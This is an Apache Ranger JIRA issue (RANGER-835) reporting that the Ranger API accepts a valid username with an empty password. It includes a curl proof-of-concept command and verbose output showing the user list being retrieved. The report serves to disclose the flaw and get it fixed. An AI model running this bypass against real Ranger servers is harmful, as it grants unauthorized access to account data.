Uploaded image for project: 'Ranger'
  1. Ranger
  2. RANGER-835

Authentication bypass in Ranger API

    XMLWordPrintableJSON

    Details

      Description

      Authentication to the Ranger API can be trivially bypassed by sending a valid username along with a null password. API authentication appears to work correctly, rejecting requests if the password is incorrect but allows requests where no password has been sent.

      The example below uses curl to demonstrate this issue by retrieving a list of the users.

      $ curl -u admin: -v http://127.0.0.1:6080/service/xusers/users

      • Trying 127.0.0.1...
      • Connected to 127.0.0.1 (127.0.0.1) port 6080 (#0)
      • Server auth using Basic with user 'admin'
        > HEAD /service/xusers/users HTTP/1.1
        > Host: 127.0.0.1:6080
        > Authorization: Basic YWRtaW46
        > User-Agent: curl/7.43.0
        > Accept: /
        >
        < HTTP/1.1 200 OK
        < Server: Apache-Coyote/1.1
        < Set-Cookie: JSESSIONID=96458E9E9A792D794D8C0D23839CFFC9; Path=/; HttpOnly
        < Content-Type: application/xml
        < Content-Length: 0
        < Date: Fri, 05 Feb 2016 11:41:16 GMT
        <
        <?xml version="1.0" encoding="UTF-8" standalone="yes"?><vxUserList><resultSize>48</resultSize><vXUsers>...

        Attachments

          Activity

            People

            • Assignee:
              Unassigned
              Reporter:
              jimhalfpenny Jim Halfpenny
            • Votes:
              1 Vote for this issue
              Watchers:
              7 Start watching this issue

              Dates

              • Created:
                Updated:
                Resolved: